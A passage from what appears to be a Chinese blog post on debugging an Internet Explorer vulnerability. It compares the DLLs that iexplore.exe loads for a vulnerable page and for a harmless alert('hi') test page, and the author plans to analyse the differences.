C:\Windows\SysWOW64\ninput.dll nsi.dll NSI User-mode interface DLL Microsoft Corporation C:\Windows\SysWOW64\nsi.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\SysWOW64\ntdll.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\System32\ntdll.dll ntmarta.dll Windows NT MARTA provider Microsoft Corporation C:\Windows\SysWOW64\ntmarta.dll ole32.dll Microsoft OLE for Windows Microsoft Corporation C:\Windows\SysWOW64\ole32.dll oleaut32.dll OLEAUT32.DLL Microsoft Corporation C:\Windows\SysWOW64\oleaut32.dll OnDemandConnRouteHelper.dll On Demand Connctiond Route Helper Microsoft Corporation C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll OneCoreCommonProxyStub.dll OneCore Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll OneCoreUAPCommonProxyStub.dll OneCoreUAP Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll powrprof.dll Power Profile Helper DLL Microsoft Corporation C:\Windows\SysWOW64\powrprof.dll profapi.dll User Profile Basic API Microsoft Corporation C:\Windows\SysWOW64\profapi.dll propsys.dll Microsoft 属性系统 Microsoft Corporation C:\Windows\SysWOW64\propsys.dll propsys.dll.mui Microsoft 属性系统 Microsoft Corporation C:\Windows\System32\zh-CN\propsys.dll.mui R000000000006.clb C:\Windows\Registration\R000000000006.clb rmclient.dll Resource Manager Client Microsoft Corporation C:\Windows\SysWOW64\rmclient.dll rpcrt4.dll 远程过程调用运行时 Microsoft Corporation C:\Windows\SysWOW64\rpcrt4.dll scrrun.dll Microsoft ® Script Runtime Microsoft Corporation C:\Windows\SysWOW64\scrrun.dll scrrun.dll Microsoft ® Script Runtime Microsoft Corporation C:\Windows\SysWOW64\scrrun.dll sechost.dll Host for SCM/SDDL/LSA Lookup APIs Microsoft Corporation C:\Windows\SysWOW64\sechost.dll secur32.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\secur32.dll SHCore.dll SHCORE Microsoft Corporation C:\Windows\SysWOW64\SHCore.dll shell32.dll Windows Shell Common Dll Microsoft Corporation C:\Windows\SysWOW64\shell32.dll shlwapi.dll 外壳简易实用工具库 Microsoft Corporation C:\Windows\SysWOW64\shlwapi.dll SortDefault.nls C:\Windows\Globalization\Sorting\SortDefault.nls srpapi.dll SRP APIs Dll Microsoft Corporation C:\Windows\SysWOW64\srpapi.dll sspicli.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\sspicli.dll StaticCache.dat C:\Windows\Fonts\StaticCache.dat SuggestedSites.dat C:\Users\bonelee\AppData\Local\Microsoft\Windows\INetCache\Low\SuggestedSites.dat sxs.dll Fusion 2.5 Microsoft Corporation C:\Windows\SysWOW64\sxs.dll TextInputFramework.dll "TextInputFramework.DYNLINK" Microsoft Corporation C:\Windows\SysWOW64\TextInputFramework.dll tokenbinding.dll Token Binding Protocol Microsoft Corporation C:\Windows\SysWOW64\tokenbinding.dll twinapi.appcore.dll twinapi.appcore Microsoft Corporation C:\Windows\SysWOW64\twinapi.appcore.dll ucrtbase.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\ucrtbase.dll urlmon.dll Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\SysWOW64\urlmon.dll urlmon.dll.mui Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\System32\zh-CN\urlmon.dll.mui user32.dll 多用户 Windows 用户 API 客户端 DLL Microsoft Corporation C:\Windows\SysWOW64\user32.dll uxtheme.dll Microsoft UxTheme Library Microsoft Corporation C:\Windows\SysWOW64\uxtheme.dll vaultcli.dll Credential Vault Client Library Microsoft Corporation C:\Windows\SysWOW64\vaultcli.dll version.dll Version Checking and File Installation Libraries Microsoft Corporation C:\Windows\SysWOW64\version.dll vm3dum_10.dll VMware SVGA 3D D3D10 Client Driver VMware, Inc. C:\Windows\SysWOW64\vm3dum_10.dll vm3dum_loader.dll VMware SVGA 3D Usermode Driver Loader VMware, Inc. C:\Windows\SysWOW64\vm3dum_loader.dll win32u.dll Win32u Microsoft Corporation C:\Windows\SysWOW64\win32u.dll windows.storage.dll Microsoft WinRT Storage API Microsoft Corporation C:\Windows\SysWOW64\windows.storage.dll winhttp.dll Windows HTTP Services Microsoft Corporation C:\Windows\SysWOW64\winhttp.dll wininet.dll Internet Extensions for Win32 Microsoft Corporation C:\Windows\SysWOW64\wininet.dll winmm.dll MCI API DLL Microsoft Corporation C:\Windows\SysWOW64\winmm.dll winmmbase.dll Base Multimedia Extension API DLL Microsoft Corporation C:\Windows\SysWOW64\winmmbase.dll winnsi.dll Network Store Information RPC interface Microsoft Corporation C:\Windows\SysWOW64\winnsi.dll wintrust.dll Microsoft Trust Verification APIs Microsoft Corporation C:\Windows\SysWOW64\wintrust.dll WinTypes.dll Windows Base Types DLL Microsoft Corporation C:\Windows\SysWOW64\WinTypes.dll wkscli.dll Workstation Service Client DLL Microsoft Corporation C:\Windows\SysWOW64\wkscli.dll wldp.dll Windows Lockdown Policy Microsoft Corporation C:\Windows\SysWOW64\wldp.dll wow64.dll Win32 Emulation on NT64 Microsoft Corporation C:\Windows\System32\wow64.dll wow64cpu.dll AMD64 Wow64 CPU Microsoft Corporation C:\Windows\System32\wow64cpu.dll wow64win.dll Wow64 Console and Win32 API Logging Microsoft Corporation C:\Windows\System32\wow64win.dll ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation C:\Windows\SysWOW64\ws2_32.dll
太多了,不知道问题在哪里!我单独创建一个正常的html文件,然后使用ie加载,文件内容如下:
<html> start! <script> alert("hi"); </script> </html>
运行后,
加载的dll如下:
Process: iexplore.exe Pid: 4808 Name Description Company Name Path {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db {AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db C:\Users\bonelee\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db {DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db ~FontCache-FontFace.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-FontFace.dat ~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat ~FontCache-System.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-System.dat advapi32.dll Advanced Windows 32 Base API Microsoft Corporation C:\Windows\SysWOW64\advapi32.dll apphelp.dll 应用程序兼容性客户端库 Microsoft Corporation C:\Windows\SysWOW64\apphelp.dll bcrypt.dll Windows Cryptographic Primitives Library (Wow64) Microsoft Corporation C:\Windows\SysWOW64\bcrypt.dll bcryptprimitives.dll Windows Cryptographic Primitives Library Microsoft Corporation C:\Windows\SysWOW64\bcryptprimitives.dll C_1252.NLS C:\Windows\System32\C_1252.NLS cfgmgr32.dll Configuration Manager DLL Microsoft Corporation C:\Windows\SysWOW64\cfgmgr32.dll clbcatq.dll COM+ Configuration Catalog Microsoft Corporation C:\Windows\SysWOW64\clbcatq.dll combase.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\combase.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll comdlg32.dll Common Dialogs DLL Microsoft Corporation C:\Windows\SysWOW64\comdlg32.dll CoreMessaging.dll Microsoft CoreMessaging Dll Microsoft Corporation C:\Windows\SysWOW64\CoreMessaging.dll CoreUIComponents.dll Microsoft Core UI Components Dll Microsoft Corporation C:\Windows\SysWOW64\CoreUIComponents.dll crypt32.dll Crypto API32 Microsoft Corporation C:\Windows\SysWOW64\crypt32.dll cryptbase.dll Base cryptographic API DLL Microsoft Corporation C:\Windows\SysWOW64\cryptbase.dll cryptsp.dll Cryptographic Service Provider API Microsoft Corporation C:\Windows\SysWOW64\cryptsp.dll cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db d2d1.dll Microsoft D2D Library Microsoft Corporation C:\Windows\SysWOW64\d2d1.dll d3d11.dll Direct3D 11 Runtime Microsoft Corporation C:\Windows\SysWOW64\d3d11.dll DataExchange.dll Data exchange Microsoft Corporation C:\Windows\SysWOW64\DataExchange.dll dcomp.dll Microsoft DirectComposition Library Microsoft Corporation C:\Windows\SysWOW64\dcomp.dll directmanipulation.dll Microsoft Direct Manipulation Component Microsoft Corporation C:\Windows\SysWOW64\directmanipulation.dll dwmapi.dll Microsoft Desktop Window Manager API Microsoft Corporation C:\Windows\SysWOW64\dwmapi.dll DWrite.dll Microsoft DirectX Typography Services Microsoft Corporation C:\Windows\SysWOW64\DWrite.dll dxgi.dll DirectX Graphics Infrastructure Microsoft Corporation C:\Windows\SysWOW64\dxgi.dll efswrt.dll Storage Protection Windows Runtime DLL Microsoft Corporation C:\Windows\SysWOW64\efswrt.dll gdi32.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32.dll gdi32full.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32full.dll ieapfltr.dll Microsoft SmartScreen Filter Microsoft Corporation C:\Windows\SysWOW64\ieapfltr.dll ieframe.dll Internet 浏览器 Microsoft Corporation C:\Windows\SysWOW64\ieframe.dll ieframe.dll.mui Internet 浏览器 Microsoft Corporation C:\Windows\System32\zh-CN\ieframe.dll.mui ieproxy.dll IE ActiveX Interface Marshaling Library Microsoft Corporation C:\Windows\SysWOW64\ieproxy.dll iertutil.dll Internet Explorer 的运行时实用程序 Microsoft Corporation C:\Windows\SysWOW64\iertutil.dll IEShims.dll Internet Explorer Compatibility Shims Microsoft Corporation C:\Program Files (x86)\Internet Explorer\IEShims.dll ieui.dll Internet Explorer UI 引擎 Microsoft Corporation C:\Windows\SysWOW64\ieui.dll iexplore.exe Internet Explorer Microsoft Corporation C:\Program Files (x86)\Internet Explorer\iexplore.exe iexplore.exe.mui Internet Explorer Microsoft Corporation C:\Program Files\internet explorer\zh-CN\iexplore.exe.mui imageres.dll Windows Image Resource Microsoft Corporation C:\Windows\SysWOW64\imageres.dll imageres.dll.mui Windows Image Resource Microsoft Corporation C:\Windows\System32\en-US\imageres.dll.mui imm32.dll Multi-User Windows IMM32 API Client DLL Microsoft Corporation C:\Windows\SysWOW64\imm32.dll IPHLPAPI.DLL IP Helper API Microsoft Corporation C:\Windows\SysWOW64\IPHLPAPI.DLL jscript9.dll Microsoft (R) JScript Microsoft Corporation C:\Windows\SysWOW64\jscript9.dll kernel.appcore.dll AppModel API Host Microsoft Corporation C:\Windows\SysWOW64\kernel.appcore.dll kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\kernel32.dll KernelBase.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\KernelBase.dll locale.nls C:\Windows\System32\locale.nls mlang.dll Multi Language Support DLL Microsoft Corporation C:\Windows\SysWOW64\mlang.dll mlang.dll.mui 多语言支持 DLL Microsoft Corporation C:\Windows\System32\zh-CN\mlang.dll.mui mpr.dll Multiple Provider Router DLL Microsoft Corporation C:\Windows\SysWOW64\mpr.dll msasn1.dll ASN.1 Runtime APIs Microsoft Corporation C:\Windows\SysWOW64\msasn1.dll msctf.dll MSCTF Server DLL Microsoft Corporation C:\Windows\SysWOW64\msctf.dll mshtml.dll Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\SysWOW64\mshtml.dll mshtml.dll.mui Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\System32\zh-CN\mshtml.dll.mui msimtf.dll Active IMM Server DLL Microsoft Corporation C:\Windows\SysWOW64\msimtf.dll msIso.dll Isolation Library for Internet Explorer Microsoft Corporation C:\Windows\SysWOW64\msIso.dll msvcp_win.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\msvcp_win.dll msvcrt.dll Windows NT CRT DLL Microsoft Corporation C:\Windows\SysWOW64\msvcrt.dll mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation C:\Windows\SysWOW64\mswsock.dll netapi32.dll Net Win32 API DLL Microsoft Corporation C:\Windows\SysWOW64\netapi32.dll netutils.dll Net Win32 API Helpers DLL Microsoft Corporation C:\Windows\SysWOW64\netutils.dll ninput.dll Microsoft Pen and Touch Input Component Microsoft Corporation C:\Windows\SysWOW64\ninput.dll nsi.dll NSI User-mode interface DLL Microsoft Corporation C:\Windows\SysWOW64\nsi.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\SysWOW64\ntdll.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\System32\ntdll.dll ntmarta.dll Windows NT MARTA provider Microsoft Corporation C:\Windows\SysWOW64\ntmarta.dll ole32.dll Microsoft OLE for Windows Microsoft Corporation C:\Windows\SysWOW64\ole32.dll oleaut32.dll OLEAUT32.DLL Microsoft Corporation C:\Windows\SysWOW64\oleaut32.dll OnDemandConnRouteHelper.dll On Demand Connctiond Route Helper Microsoft Corporation C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll OneCoreCommonProxyStub.dll OneCore Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll OneCoreUAPCommonProxyStub.dll OneCoreUAP Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll powrprof.dll Power Profile Helper DLL Microsoft Corporation C:\Windows\SysWOW64\powrprof.dll profapi.dll User Profile Basic API Microsoft Corporation C:\Windows\SysWOW64\profapi.dll propsys.dll Microsoft 属性系统 Microsoft Corporation C:\Windows\SysWOW64\propsys.dll propsys.dll.mui Microsoft 属性系统 Microsoft Corporation C:\Windows\System32\zh-CN\propsys.dll.mui R000000000006.clb C:\Windows\Registration\R000000000006.clb rmclient.dll Resource Manager Client Microsoft Corporation C:\Windows\SysWOW64\rmclient.dll rpcrt4.dll 远程过程调用运行时 Microsoft Corporation C:\Windows\SysWOW64\rpcrt4.dll sechost.dll Host for SCM/SDDL/LSA Lookup APIs Microsoft Corporation C:\Windows\SysWOW64\sechost.dll secur32.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\secur32.dll SHCore.dll SHCORE Microsoft Corporation C:\Windows\SysWOW64\SHCore.dll shell32.dll Windows Shell Common Dll Microsoft Corporation C:\Windows\SysWOW64\shell32.dll shlwapi.dll 外壳简易实用工具库 Microsoft Corporation C:\Windows\SysWOW64\shlwapi.dll simsun.ttc C:\Windows\Fonts\simsun.ttc SortDefault.nls C:\Windows\Globalization\Sorting\SortDefault.nls srpapi.dll SRP APIs Dll Microsoft Corporation C:\Windows\SysWOW64\srpapi.dll sspicli.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\sspicli.dll StaticCache.dat C:\Windows\Fonts\StaticCache.dat SuggestedSites.dat C:\Users\bonelee\AppData\Local\Microsoft\Windows\INetCache\Low\SuggestedSites.dat TextInputFramework.dll "TextInputFramework.DYNLINK" Microsoft Corporation C:\Windows\SysWOW64\TextInputFramework.dll tokenbinding.dll Token Binding Protocol Microsoft Corporation C:\Windows\SysWOW64\tokenbinding.dll twinapi.appcore.dll twinapi.appcore Microsoft Corporation C:\Windows\SysWOW64\twinapi.appcore.dll ucrtbase.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\ucrtbase.dll urlmon.dll Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\SysWOW64\urlmon.dll urlmon.dll.mui Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\System32\zh-CN\urlmon.dll.mui user32.dll 多用户 Windows 用户 API 客户端 DLL Microsoft Corporation C:\Windows\SysWOW64\user32.dll uxtheme.dll Microsoft UxTheme Library Microsoft Corporation C:\Windows\SysWOW64\uxtheme.dll vaultcli.dll Credential Vault Client Library Microsoft Corporation C:\Windows\SysWOW64\vaultcli.dll version.dll Version Checking and File Installation Libraries Microsoft Corporation C:\Windows\SysWOW64\version.dll vm3dum_10.dll VMware SVGA 3D D3D10 Client Driver VMware, Inc. C:\Windows\SysWOW64\vm3dum_10.dll vm3dum_loader.dll VMware SVGA 3D Usermode Driver Loader VMware, Inc. C:\Windows\SysWOW64\vm3dum_loader.dll win32u.dll Win32u Microsoft Corporation C:\Windows\SysWOW64\win32u.dll windows.storage.dll Microsoft WinRT Storage API Microsoft Corporation C:\Windows\SysWOW64\windows.storage.dll winhttp.dll Windows HTTP Services Microsoft Corporation C:\Windows\SysWOW64\winhttp.dll wininet.dll Internet Extensions for Win32 Microsoft Corporation C:\Windows\SysWOW64\wininet.dll winmm.dll MCI API DLL Microsoft Corporation C:\Windows\SysWOW64\winmm.dll winmmbase.dll Base Multimedia Extension API DLL Microsoft Corporation C:\Windows\SysWOW64\winmmbase.dll winnsi.dll Network Store Information RPC interface Microsoft Corporation C:\Windows\SysWOW64\winnsi.dll wintrust.dll Microsoft Trust Verification APIs Microsoft Corporation C:\Windows\SysWOW64\wintrust.dll WinTypes.dll Windows Base Types DLL Microsoft Corporation C:\Windows\SysWOW64\WinTypes.dll wkscli.dll Workstation Service Client DLL Microsoft Corporation C:\Windows\SysWOW64\wkscli.dll wldp.dll Windows Lockdown Policy Microsoft Corporation C:\Windows\SysWOW64\wldp.dll wow64.dll Win32 Emulation on NT64 Microsoft Corporation C:\Windows\System32\wow64.dll wow64cpu.dll AMD64 Wow64 CPU Microsoft Corporation C:\Windows\System32\wow64cpu.dll wow64win.dll Wow64 Console and Win32 API Logging Microsoft Corporation C:\Windows\System32\wow64win.dll ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation C:\Windows\SysWOW64\ws2_32.dll
我们使用diff工具比较下差异:左边是hello world正常网页,右边是有上述漏洞页面的dll清单
好了,看到核心的几个dll加载了!
明天分析下加载这几个dll的原因。